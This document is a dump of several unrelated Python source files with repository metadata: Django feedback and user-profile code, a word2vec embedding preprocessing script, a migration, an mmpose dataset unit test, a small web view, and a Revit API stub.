def send_sms_notification(self, obj):
if not apps.is_installed('turbosms'):
return
from turbosms.lib import send_sms_from_template
context = self.get_notifications_context(obj)
send_sms_from_template('feedback/sms.txt', context)
def get_notifications_context(self, obj):
return {
'object': obj,
'site': apps.get_model('sites', 'Site').objects.get_current()
}
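# A hedged wiring sketch (URL path and name are assumptions, not part of this
# module):
#
#   # urls.py
#   from django.urls import path
#   from feedback.views import CreateFeedbackView
#
#   urlpatterns = [
#       path('feedback/', CreateFeedbackView.as_view(), name='feedback'),
#   ]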
|
[
"pmaigutyak@gmail.com"
] |
pmaigutyak@gmail.com
|
238e9f37d5e366d3845c2409f3db92ee35db09c2
|
1e90f2e153c9040c4e0ff417e009bf929ddfa1a4
|
/preprocess.py
|
13ebed8963e1c6314cfb23827dd8f2b107d65d85
|
[] |
no_license
|
hkxIron/SlotGated-SLU
|
d83b786b3f9243fd04bffe6c13d451c435b15679
|
dc17780cc37f79ed9c4c3854af1c076020742a2f
|
refs/heads/master
| 2020-04-11T12:19:19.724026
| 2019-03-10T16:35:51
| 2019-03-10T16:35:51
| 161,776,548
| 0
| 0
| null | 2018-12-14T11:37:22
| 2018-12-14T11:37:21
| null |
UTF-8
|
Python
| false
| false
| 2,007
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/28 08:55 PM
# @Author : Aaron Chou
# @Site : https://github.com/InsaneLife
import gensim
import numpy as np
data_root = 'E:\project_data\word_vector/'
model_path = data_root + 'GoogleNews-vectors-negative300.bin.gz'
# load the pretrained word2vec model
model = gensim.models.KeyedVectors.load_word2vec_format(model_path, binary=True)
# model.save_word2vec_format(data_root + 'GoogleNews-vectors-negative300.txt', binary=False)
google_embedding_path = data_root + 'GoogleNews-vectors-negative300.txt'
# print(model['to'])
def get_embedding_map(path):
map = {}
with open(path, 'r',encoding="utf-8") as f:
for each in f.readlines():
each = each.strip().split()
map[each[0]] = [float(x) for x in each[1:]]
return map
def write_vector2file(embedding_map, vocab_path, out_path, dim):
with open(vocab_path) as vocabs:
vocabs = vocabs.readlines()
embedding = np.zeros([len(vocabs), dim])
for i, v in enumerate(vocabs):
v = v.strip()
try:
embedding[i] = np.array(embedding_map[v])
except:
continue
np.save(out_path, embedding)
def write_model_vector2file(model, vocab_path, out_path, dim):
with open(vocab_path) as vocabs:
vocabs = vocabs.readlines()
embedding = np.zeros([len(vocabs), dim])
for i, v in enumerate(vocabs):
v = v.strip()
try:
embedding[i] = np.array(model[v])
except:
print("do not have: {}".format(v))
continue
np.save(out_path, embedding)
vocab_path = "./vocab/in_vocab"
out_path = "./vocab/google_in_vocab_embedding.npy"
dim = 300
# embedding_map = get_embedding_map(google_embedding_path)
# write_vector2file(embedding_map, vocab_path, out_path, dim)
write_model_vector2file(model, vocab_path, out_path, dim)
|
[
"hukexin0000@126.com"
] |
hukexin0000@126.com
|
b06d8c40c0056f651b15c192c20b92aa0e21e03f
|
84e661d5d293ec0c544fedab7727767f01e7ddcf
|
/gallery/migrations-old/0009_photograph_featured.py
|
6408790716972e18b35daf2e444fa702b7aff740
|
[
"BSD-3-Clause"
] |
permissive
|
groundupnews/gu
|
ea6734fcb9509efc407061e35724dfe8ba056044
|
4c036e79fd735dcb1e5a4f15322cdf87dc015a42
|
refs/heads/master
| 2023-08-31T13:13:47.178119
| 2023-08-18T11:42:58
| 2023-08-18T11:42:58
| 48,944,009
| 21
| 23
|
BSD-3-Clause
| 2023-09-14T13:06:42
| 2016-01-03T11:56:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 457
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-11-17 11:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gallery', '0008_auto_20161104_1658'),
]
operations = [
migrations.AddField(
model_name='photograph',
name='featured',
field=models.BooleanField(default=False),
),
]
|
[
"nathangeffen@gmail.com"
] |
nathangeffen@gmail.com
|
29fcf5c22c1c7225a673988eb942de70924f71d7
|
0db19410e9751790af8ce4a0a9332293e379c02f
|
/tests/test_datasets/test_datasets/test_animal_datasets/test_animalkingdom_dataset.py
|
cc5e42ffbbdc7b17adaeaedc41fc52bc0cc6667a
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmpose
|
2c9986521d35eee35d822fb255e8e68486026d94
|
537bd8e543ab463fb55120d5caaa1ae22d6aaf06
|
refs/heads/main
| 2023-08-30T19:44:21.349410
| 2023-07-04T13:18:22
| 2023-07-04T13:18:22
| 278,003,645
| 4,037
| 1,171
|
Apache-2.0
| 2023-09-14T09:44:55
| 2020-07-08T06:02:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,276
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from unittest import TestCase
import numpy as np
from mmpose.datasets.datasets.animal import AnimalKingdomDataset
class TestAnimalKingdomDataset(TestCase):
def build_ak_dataset(self, **kwargs):
cfg = dict(
ann_file='test_animalkingdom.json',
bbox_file=None,
data_mode='topdown',
data_root='tests/data/ak',
pipeline=[],
test_mode=False)
cfg.update(kwargs)
return AnimalKingdomDataset(**cfg)
def check_data_info_keys(self,
data_info: dict,
data_mode: str = 'topdown'):
if data_mode == 'topdown':
expected_keys = dict(
img_id=int,
img_path=str,
bbox=np.ndarray,
bbox_score=np.ndarray,
keypoints=np.ndarray,
keypoints_visible=np.ndarray,
id=int)
elif data_mode == 'bottomup':
expected_keys = dict(
img_id=int,
img_path=str,
bbox=np.ndarray,
bbox_score=np.ndarray,
keypoints=np.ndarray,
keypoints_visible=np.ndarray,
invalid_segs=list,
id=list)
else:
raise ValueError(f'Invalid data_mode {data_mode}')
for key, type_ in expected_keys.items():
self.assertIn(key, data_info)
self.assertIsInstance(data_info[key], type_, key)
def check_metainfo_keys(self, metainfo: dict):
expected_keys = dict(
dataset_name=str,
num_keypoints=int,
keypoint_id2name=dict,
keypoint_name2id=dict,
upper_body_ids=list,
lower_body_ids=list,
flip_indices=list,
flip_pairs=list,
keypoint_colors=np.ndarray,
num_skeleton_links=int,
skeleton_links=list,
skeleton_link_colors=np.ndarray,
dataset_keypoint_weights=np.ndarray)
for key, type_ in expected_keys.items():
self.assertIn(key, metainfo)
self.assertIsInstance(metainfo[key], type_, key)
def test_metainfo(self):
dataset = self.build_ak_dataset()
self.check_metainfo_keys(dataset.metainfo)
# test dataset_name
self.assertEqual(dataset.metainfo['dataset_name'], 'Animal Kingdom')
# test number of keypoints
num_keypoints = 23
self.assertEqual(dataset.metainfo['num_keypoints'], num_keypoints)
self.assertEqual(
len(dataset.metainfo['keypoint_colors']), num_keypoints)
self.assertEqual(
len(dataset.metainfo['dataset_keypoint_weights']), num_keypoints)
# note that len(sigmas) may be zero if dataset.metainfo['sigmas'] = []
self.assertEqual(len(dataset.metainfo['sigmas']), num_keypoints)
# test some extra metainfo
self.assertEqual(
len(dataset.metainfo['skeleton_links']),
len(dataset.metainfo['skeleton_link_colors']))
def test_topdown(self):
# test topdown training
dataset = self.build_ak_dataset(data_mode='topdown')
self.assertEqual(dataset.data_mode, 'topdown')
self.assertEqual(dataset.bbox_file, None)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0])
# test topdown testing
dataset = self.build_ak_dataset(data_mode='topdown', test_mode=True)
self.assertEqual(dataset.data_mode, 'topdown')
self.assertEqual(dataset.bbox_file, None)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0])
def test_bottomup(self):
# test bottomup training
dataset = self.build_ak_dataset(data_mode='bottomup')
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0], data_mode='bottomup')
# test bottomup testing
dataset = self.build_ak_dataset(data_mode='bottomup', test_mode=True)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0], data_mode='bottomup')
def test_exceptions_and_warnings(self):
with self.assertRaisesRegex(ValueError, 'got invalid data_mode'):
_ = self.build_ak_dataset(data_mode='invalid')
with self.assertRaisesRegex(
ValueError,
'"bbox_file" is only supported when `test_mode==True`'):
_ = self.build_ak_dataset(
data_mode='topdown',
test_mode=False,
bbox_file='temp_bbox_file.json')
with self.assertRaisesRegex(
ValueError, '"bbox_file" is only supported in topdown mode'):
_ = self.build_ak_dataset(
data_mode='bottomup',
test_mode=True,
bbox_file='temp_bbox_file.json')
with self.assertRaisesRegex(
ValueError,
'"bbox_score_thr" is only supported in topdown mode'):
_ = self.build_ak_dataset(
data_mode='bottomup',
test_mode=True,
filter_cfg=dict(bbox_score_thr=0.3))
|
[
"noreply@github.com"
] |
open-mmlab.noreply@github.com
|
3a2e785791e7462bb3a02e89809ac03e184ec239
|
188d5160cbc54d36d76110ad75478db951b525ac
|
/consumer/models.py
|
1fb2eb82e6b5ee5d1a14be3358cf9295f3ccb39e
|
[] |
no_license
|
adnankattekaden/hackathon
|
660d71e11d00e6f8cce8c1b994ed2c8ab0a76bd1
|
329447d1a461a96a919d90be37dce1fb386f75db
|
refs/heads/master
| 2023-02-27T08:58:32.903279
| 2021-01-25T07:00:29
| 2021-01-25T07:00:29
| 332,652,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.db import models
from django.contrib.auth.models import User,auth
# Create your models here.
class UserDetails(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
mobile_number = models.BigIntegerField(null=True,blank=True)
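# Hypothetical usage sketch (not from the original file): the profile row is
# created alongside Django's built-in User, e.g.
#   UserDetails.objects.create(user=some_user, mobile_number=9876543210)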
|
[
"adnankattekaden2020@gmail.com"
] |
adnankattekaden2020@gmail.com
|
e5c3a7732b89ca410005224d0909b9aae4783c99
|
385ce240ae264a1449079c21bd0c4cbe7c0fe3b8
|
/GUI/rovan.py
|
a86c206a7737e0fefdd6181a8e91f57041743956
|
[] |
no_license
|
Maxcousin123/Python-workspace
|
3ed60ae80d790b5c055bf47872ff0fdd39f4ec58
|
326b023190a12e082dcb35ae5ab8ef644c32159b
|
refs/heads/master
| 2022-11-24T11:05:08.707003
| 2020-07-29T06:32:08
| 2020-07-29T06:32:08
| 283,415,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,396
|
py
|
import mysql.connector
x,y,z,v='color: ','size: ','price: ','Enter the code: '
mydb = mysql.connector.connect(
host='localhost',
user='maxcousin',
password='secret :)',
database='testdb' #to request a specific database
)
mycursor = mydb.cursor()
def newdata(b,c,d,e):
"""to insert the code and data"""
mycursor = mydb.cursor()
mycursor.execute('SELECT * FROM rovan WHERE code=(%s) ',(b,));
myresult = mycursor.fetchall()
    if len(myresult) > 0:  # any matching row means the code already exists
        print('code already exists')
else:
mycursor = mydb.cursor()
sqlFormula = "INSERT INTO rovan (code, size, price, color) VALUES (%s, %s, %s ,%s)"
rovan1 = (b, d, e, c)
mycursor.execute(sqlFormula, rovan1)
mydb.commit()
print('Done !')
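# Hypothetical usage sketch (values invented for illustration):
#   newdata(101, 'red', 'M,L', '250')  # inserts product code 101 if it is new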
def olddata(g):
'''to get the data related to code'''
try:
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM rovan WHERE code=(%s)",(g,));
myresult = mycursor.fetchall()
for result in myresult:
print(result)
except:
print('Error')
def editcode(f):
i = input('what will you edit ?: ')
if i == ('price'):
j = input("Enter the new price: ")
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET price=(%s) WHERE code=(%s)",(j,f));
mydb.commit()
print('Done')
elif i == ('size'):
k = input('Enter the sizes: ')
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET size=(%s) WHERE code=(%s)",(k,f));
mydb.commit()
print('Done')
elif i == ('color'):
        l = input('Enter the colors: ')  # original assigned the prompt string instead of calling input()
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET color=(%s) WHERE code=(%s)",(l,f));
mydb.commit()
print('Done')
else:
print('Wrong command')
def delcode(h):
try:
mycursor.execute("DELETE FROM rovan WHERE code=(%s)",(h,));
mydb.commit()
print('Done !')
except:
print("Error")
a = input('What will you do ?: ')
if a == 'new code':
b = int(input(v))
c = input(x)
d = input(y)
e = input(z)
newdata(b,c,d,e)
elif a == 'edit code':
f = input(v)
editcode(f)
elif a == 'old code':
g = input(v)
olddata(g)
elif a == 'delete code':
h = input(v)
delcode(h)
else:
print('Wrong command')
|
[
"66350396+Maxcousin123@users.noreply.github.com"
] |
66350396+Maxcousin123@users.noreply.github.com
|
527b0be34e8054db78151a98fa3d6f2997ac2bb7
|
1f067fe2e85ccf2c11b6cbece41028273fa6dcd6
|
/tests/test_user.py
|
c454a18cb82b75f46a56653019a313078cd507e1
|
[
"MIT"
] |
permissive
|
mireille1999/Pitches
|
f02d76396c69ed36dd4b019dda9e588c7a52b291
|
425d996404569b23f63fe5217867adc0ac2f3afc
|
refs/heads/main
| 2023-03-31T08:56:52.953314
| 2021-03-31T10:45:13
| 2021-03-31T10:45:13
| 353,043,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 839
|
py
|
import unittest
from app.models import User
from os import urandom
class UserModelTest(unittest.TestCase):
"""
Test class to test the behaviour of the user class
"""
def setUp(self):
"""
Set up method that will run before every Test
"""
self.new_user = User(username='mireille', password = 'potatopeel420')
def test_password_setter(self):
self.assertTrue(self.new_user.password_hash is not None)
def test_no_access_password(self):
with self.assertRaises(AttributeError):
self.new_user.password
def test_password_verification(self):
self.assertTrue(self.new_user.verify_password('potatopeel420'))
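    # For reference, the model under test presumably follows the common Flask
    # pattern sketched below (an assumption; the real code lives in app/models.py):
    #   from werkzeug.security import generate_password_hash, check_password_hash
    #   @property
    #   def password(self):
    #       raise AttributeError('password is not a readable attribute')
    #   @password.setter
    #   def password(self, password):
    #       self.password_hash = generate_password_hash(password)
    #   def verify_password(self, password):
    #       return check_password_hash(self.password_hash, password)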
def tearDown(self):
user = User.query.filter_by(username="cjjhvghxdf").first()
if user:
print("found")
|
[
"muhawenimana920@daviscollege.com"
] |
muhawenimana920@daviscollege.com
|
d2d1d9574f9531a0aa9afcb6fcad627939cbaf98
|
b685c82024360588ccff3db9004c01ba8292fd62
|
/tools/zoom/templates/apps/basic/index.py
|
b174f07c7cfe7786142add35e6ffd4f627d2621a
|
[
"MIT"
] |
permissive
|
sean-hayes/zoom
|
2a9662d568e9ca04f0bed99c63275af5680b7e9f
|
eda69c64ceb69dd87d2f7a5dfdaeea52ef65c581
|
refs/heads/master
| 2021-01-19T10:39:10.274324
| 2017-12-20T22:44:26
| 2017-12-20T22:44:26
| 87,887,573
| 1
| 1
| null | 2017-04-11T04:16:47
| 2017-04-11T04:16:47
| null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
"""
basic index
"""
import zoom
class MyView(zoom.View):
"""Index View"""
def index(self):
"""Index page"""
return zoom.page('Content goes here', title='Overview')
def about(self):
"""About page"""
content = '{app.description}'
return zoom.page(
content.format(app=zoom.system.request.app),
title='About {app.title}'.format(app=zoom.system.request.app)
)
view = MyView()
|
[
"herb@dynamic-solutions.com"
] |
herb@dynamic-solutions.com
|
ff47bf42bf696623df4bb9b6b23f46bb1c872804
|
f50fca4275b43ed0fc7411e5d4a79c75ef1c1ed7
|
/maximalsum.py
|
8d4c8efc5e2963e16a5b14766fcbb4da2fa59600
|
[] |
no_license
|
swang2000/DP
|
2169a85eec05d9be13cbcee1dcaf417ee4c4d70f
|
6d9523398a9f4e802213b1184166a90530bfc26b
|
refs/heads/master
| 2020-04-05T09:55:02.004433
| 2018-11-08T23:10:01
| 2018-11-08T23:10:01
| 156,780,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
'''
Dynamic Programming | Set 31 (Optimal Strategy for a Game)
Problem statement: Consider a row of n coins of values v1 . . . vn, where n is even. We play a game against an opponent
by alternating turns. In each turn, a player selects either the first or last coin from the row, removes it from the
row permanently, and receives the value of the coin. Determine the maximum possible amount of money we can definitely
win if we move first.
Note: The opponent is as clever as the user.
Let us understand the problem with a few examples:
1. 5, 3, 7, 10 : The user collects maximum value as 15 (10 + 5)
2. 8, 15, 3, 7 : The user collects maximum value as 22 (7 + 15)
Does choosing the best at each move give an optimal solution?
No. In the second example, this is how the game can finish:
1. User chooses 8. Opponent chooses 15. User chooses 7. Opponent chooses 3.
   Total value collected by user is 15 (8 + 7)
2. User chooses 7. Opponent chooses 8. User chooses 15. Opponent chooses 3.
   Total value collected by user is 22 (7 + 15)
'''
def maximalsum(a):
if len(a) ==0:
return 0
if len(a) == 2:
return max(a)
return max(a[0]+ min(maximalsum(a[2:]), maximalsum(a[1:-1])),
a[-1]+min(maximalsum(a[1:-1]), maximalsum(a[:-2])))
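# The plain recursion above recomputes subproblems exponentially; a memoized
# sketch (added here for illustration, not part of the original file) runs in
# O(n^2) over the (i, j) subranges:
def maximalsum_memo(a):
    from functools import lru_cache
    @lru_cache(maxsize=None)
    def best(i, j):
        # best value we can guarantee from the remaining coins a[i..j]
        if i > j:
            return 0
        if i == j:
            return a[i]
        if j - i == 1:
            return max(a[i], a[j])
        return max(a[i] + min(best(i + 2, j), best(i + 1, j - 1)),
                   a[j] + min(best(i + 1, j - 1), best(i, j - 2)))
    return best(0, len(a) - 1)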
a = [5, 3, 7, 10]
b = [8, 15, 3, 7]
print(maximalsum(a))  # expected 15
print(maximalsum(b))  # expected 22
|
[
"swang2000@gmail.com"
] |
swang2000@gmail.com
|
c6ce4a8d43a2a3b900beb1f0c64bc4d7f9912bf0
|
5fd96aaeebcf137b46c611ad992de307861639a1
|
/recollection/apps/support/forms.py
|
74fbfd9abc5d92361edb2d02a1b7053380ee87f9
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LicenseRef-scancode-secret-labs-2011",
"CC-BY-2.5",
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
tfmorris/recollection
|
f91800c569ee9d05334e085c8dd050bc65ae23ca
|
9e818f91b30b43b392ad9ca608e0068f868a51c1
|
refs/heads/master
| 2021-01-18T03:58:20.393406
| 2012-04-15T22:08:39
| 2012-04-15T22:08:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,770
|
py
|
from django import forms
from django.forms import widgets
from django.utils.translation import ugettext_lazy as _
from django.utils import simplejson as json
from . import models
class SupportIssueForm(forms.Form):
"""
Base form for recollection support
>>> f = SupportIssueForm({'contact_type':'email', 'contact_email':'test@example.com'})
>>> f.is_valid()
True
    >>> f.cleaned_data.get("contact_type_pretty") == _("E-mail")
True
"""
contact_type = forms.ChoiceField(required=True,
choices=[('email',_('E-mail')), ('phone',_('Phone'))],
label=_("Preferred Contact Method"))
contact_email = forms.EmailField(required=False, max_length=200, label=_("E-mail address"))
contact_phone = forms.CharField(required=False, max_length=25, label=_("Phone number"))
browser = forms.ChoiceField(label=_("Browser"),
help_text=_("Please select your browser from the list, or 'Other' to enter an alternative"),
required=False)
browser_text=forms.CharField(required=False, label=_("Browser Description"), help_text=_("Please describe your browser"))
def __init__(self, *args, **kwargs):
super(SupportIssueForm, self).__init__(*args, **kwargs)
self.fields["browser"].choices = [('',''),] + [(b.key, b.value,) for b in models.BrowserPickListItem.objects.all()] + [('other', 'Other',),]
def clean(self):
cleaned_data = self.cleaned_data
for val in self.fields['contact_type'].choices:
if val[0] == cleaned_data.get('contact_type'):
cleaned_data["contact_type_pretty"] = val[1]
for val in self.fields['browser'].choices:
if val[0] == cleaned_data.get('browser') and cleaned_data.get('browser') != 'other':
cleaned_data["browser_text"] = val[1]
return cleaned_data
def clean_contact_email(self):
contact_type = self.cleaned_data.get("contact_type")
email = self.cleaned_data.get("contact_email")
if contact_type == "email":
if not email:
raise forms.ValidationError(_("Please supply an e-mail address"))
else:
self.cleaned_data["contact_point"] = email
return email
def clean_contact_phone(self):
contact_type = self.cleaned_data.get("contact_type")
phone = self.cleaned_data.get("contact_phone")
if contact_type == "phone":
if not phone:
raise forms.ValidationError(_("Please supply a phone number"))
else:
self.cleaned_data["contact_point"] = phone
return phone
def clean_browser_text(self):
browser_text = self.cleaned_data.get("browser_text")
browser = self.cleaned_data.get("browser")
if browser:
if not browser == "other":
browser_text = models.BrowserPickListItem.objects.get(key=browser).value
elif not browser_text:
raise forms.ValidationError(_("Please describe your browser"))
return browser_text
class DataLoadUploadIssueForm(SupportIssueForm):
issue_reason = forms.ChoiceField(required=True, label=_("Reason"),
help_text="Please select the issue you are experiencing, or 'Other' if it isn't listed")
issue_reason_text = forms.CharField(required=False, label=_("Description"))
file_format=forms.ChoiceField(required=True, label=_("Format"),
help_text="Please select the format of the file you are attempting to load, or 'Other' to enter another format")
file_format_text=forms.CharField(required=False, label=_("File Format Description"), help_text=_("Please describe your file format"))
def __init__(self, *args, **kwargs):
super(DataLoadUploadIssueForm, self).__init__(*args, **kwargs)
self.fields["file_format"].choices = [(b.key, b.value,) for b in models.FileFormatPickListItem.objects.all()] + [('other', 'Other',),]
self.fields["issue_reason"].choices = [(b.key, b.value,) for b in models.DataLoadReasonPickListItem.objects.all()] + [('other', 'Other',),]
def clean_file_format_text(self):
file_format_text = self.cleaned_data.get("file_format_text")
file_format = self.cleaned_data.get("file_format")
if file_format:
if not file_format == "other":
file_format_text = models.FileFormatPickListItem.objects.get(key=file_format).value
elif not file_format_text:
raise forms.ValidationError(_("Please describe your file format"))
return file_format_text
def clean_issue_reason_text(self):
issue_reason_text = self.cleaned_data.get("issue_reason_text")
issue_reason=self.cleaned_data.get("issue_reason")
if not issue_reason == "other":
issue_reason_text = models.DataLoadReasonPickListItem.objects.get(key=issue_reason).value
elif not issue_reason_text:
raise forms.ValidationError(_("Please describe your data loading issue"))
return issue_reason_text
class DataLoadIgnoredFieldsIssueForm(SupportIssueForm):
"""
Form for reporting ignored data in transformation
"""
elements = forms.CharField(required=True, widget=widgets.Textarea, help_text=_("Please edit this list to highlight the elements or attributes for which you would like support"))
comments = forms.CharField(required=False, widget=widgets.Textarea,
label=_("Additional Comments"),
help_text=_("Any additional information about your data or the issue you are experiencing that could be helpful"))
class AugmentationIssueForm(SupportIssueForm):
"""
Form for data augmentation support.
Requires that the `profile_json` field be populated with a JSON snapshot of the dataset
"""
profile_json = forms.CharField(required=True, widget=widgets.HiddenInput)
field_name = forms.CharField(required=False,
label="Augmented Field",
help_text=_("Enter a label to highlight a particular field"))
comments = forms.CharField(required=False, widget=widgets.Textarea,
label=_("Additional Comments"),
help_text=_("Any additional information about your data or the issue you are experiencing that could be helpful"))
def clean_profile_json(self):
try:
return json.loads(self.cleaned_data.get("profile_json"))
except:
raise forms.ValidationError(_("Invalid profile description"))
|
[
"dfeeney@gmail.com"
] |
dfeeney@gmail.com
|
bc6753a7cd0f2642d7b4b8c2e587b1fdbd850bd8
|
33ce95a46bad431fb9acde07f10f472c43533824
|
/functions_advanced_lab/absolute_values.py
|
0e7d743dc7d8b0c0dd460d48eb7f661c1730c4b7
|
[] |
no_license
|
ivan-yosifov88/python_advanced
|
91dead1a44771a46e85cecdfc6b02e11c0cb4d91
|
21830aabc87eb28eb32bf3c070bf202b4740f628
|
refs/heads/main
| 2023-06-29T21:31:30.285019
| 2021-06-23T20:31:36
| 2021-06-23T20:31:36
| 342,571,734
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
def read_input():
list_of_numbers = [float(num) for num in input().split()]
return list_of_numbers
def print_result(numbers_list):
print([abs(num) for num in numbers_list])
numbers = read_input()
print_result(numbers)
|
[
"ivan.yosifov88gmail.com"
] |
ivan.yosifov88gmail.com
|
93a13f5c7aae90aafc40f7680b9fdc982234540b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch73_2020_04_22_12_07_59_451590.py
|
7d390abc9a0f7b282992c69a56b50822905358f1
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 273
|
py
|
def remove_vogais(palavra):
    # removes vowels in place; expects `palavra` as a list of characters
    # (del does not work on an immutable str)
    i = 0
    while i < len(palavra):
        if palavra[i] in ('a', 'e', 'i', 'o', 'u'):
            del palavra[i]
            # do not advance i: the next character has shifted into slot i
        else:
            i += 1
    return palavra
|
[
"you@example.com"
] |
you@example.com
|
7cf703c9e6a3e84f639e61fbb79d305d183c1026
|
73758dde83d1a1823c103e1a4ba71e7c95168f71
|
/nsd2006/devops/day02/dingtalk.py
|
f09a620f5c3c08dd4c56aa692938ff3c8368b2ce
|
[] |
no_license
|
tonggh220/md_5_nsd_notes
|
07ffdee7c23963a7a461f2a2340143b0e97bd9e1
|
a58a021ad4c7fbdf7df327424dc518f4044c5116
|
refs/heads/master
| 2023-07-02T01:34:38.798929
| 2021-05-12T08:48:40
| 2021-05-12T08:48:40
| 393,885,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
import requests
import json
url = ''  # DingTalk robot webhook URL (left empty in the original)
headers = {'Content-Type': 'application/json; charset=UTF-8'}
# data = {
#     "msgtype": "text",
#     "text": {
#         "content": "I am what I am, a different kind of firework. Study hard and improve every day"
#     },
#     "at": {  # which phone numbers to @-mention
#         "atMobiles": [
#             # "156xxxx8827",
#             # "189xxxx8325"
#         ],
#         "isAtAll": False  # whether to @-mention everyone
#     }
# }
data = {
"msgtype": "markdown",
"markdown": {
"title": "Offer",
"text": """## 入职邀请
您已被我公司录取,请于2020-12-10来报到,公司详情参见:[TEDU](http://www.tedu.cn)

好好学习天天向上"""
},
"at": {
"atMobiles": [
# "150XXXXXXXX"
],
"isAtAll": False
}
}
r = requests.post(url, headers=headers, data=json.dumps(data))
print(r.json())
|
[
"zhangzg@tedu.cn"
] |
zhangzg@tedu.cn
|
4f1d9ab5863aa6c57561c239f1fac7c3dcaad503
|
4b7b46a6d0f8ebeb544ff4b213a9c710e4db59c1
|
/src/make_select_occultation_times_table.py
|
37167b9a48f724cf579391caca8ae2f839332f1f
|
[] |
no_license
|
lgbouma/WASP-4b_anomaly
|
7eb44a54af553298075c69a3e4f7d9ea607bb762
|
124b0bb9912e43d47d98f6dfc390be7ef9823095
|
refs/heads/master
| 2021-08-19T20:28:18.577334
| 2020-04-11T17:49:09
| 2020-04-11T17:49:09
| 160,554,122
| 0
| 0
| null | 2020-02-09T14:13:21
| 2018-12-05T17:27:01
|
TeX
|
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
# -*- coding: utf-8 -*-
'''
make table of selected transit times
'''
from __future__ import division, print_function
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt, pandas as pd, numpy as np
from glob import glob
import os, pickle
def get_data(
datacsv='../data/WASP-18b_literature_and_TESS_times_O-C_vs_epoch_selected.csv'
):
# need to run make_parameter_vs_epoch_plots.py first; this generates the
# SELECTED epochs (x values), mid-times (y values), and mid-time errors
# (sigma_y).
df = pd.read_csv(datacsv, sep=';')
return df
def main():
plname = 'WASP-4b'
allseldatapath = (
'/home/luke/Dropbox/proj/tessorbitaldecay/data/'+
'{:s}_occultation_times_selected.csv'.
format(plname)
)
df = get_data(datacsv=allseldatapath)
midpoints = np.array(df['sel_occ_times_BJD_TDB'])
uncertainty = np.array(df['err_sel_occ_times_BJD_TDB'])
epochs = np.array(df['sel_epoch']).astype(int)
original_references = np.array(df['original_reference'])
references = []
for ref in original_references:
if ref == '2011A&A...530A...5C':
references.append('\citet{caceres_ground-based_2011}')
elif ref == '2011ApJ...727...23B':
references.append('\citet{beerer_secondary_2011}')
elif ref == '2015MNRAS.454.3002Z':
references.append('\citet{zhou_secondary_2015}')
references = np.array(references)
outdf = pd.DataFrame(
{'midpoints': np.round(midpoints,5),
'uncertainty': np.round(uncertainty,5),
'epochs': epochs,
'original_reference': references
}
)
outdf['midpoints'] = outdf['midpoints'].map('{:.5f}'.format)
outdf = outdf[
['midpoints', 'uncertainty', 'epochs', 'original_reference']
]
outpath = 'selected_occultation_times.tex'
with open(outpath,'w') as tf:
print('wrote {:s}'.format(outpath))
tf.write(outdf.to_latex(index=False, escape=False))
if __name__=="__main__":
main()
|
[
"lgbouma@mit.edu"
] |
lgbouma@mit.edu
|
335248f2dc979c968e6eebcf946bc83489b010b2
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs.min/Autodesk/Revit/DB/__init___parts/FilterDoubleRule.py
|
27c4478ffdcdb2e5d8a367b3b2f1c85017c412ed
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,749
|
py
|
class FilterDoubleRule(FilterNumericValueRule,IDisposable):
"""
A filter rule that operates on double-precision numeric values in a Revit project.
FilterDoubleRule(valueProvider: FilterableValueProvider,evaluator: FilterNumericRuleEvaluator,ruleValue: float,epsilon: float)
"""
def Dispose(self):
""" Dispose(self: FilterRule,A_0: bool) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: FilterRule,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
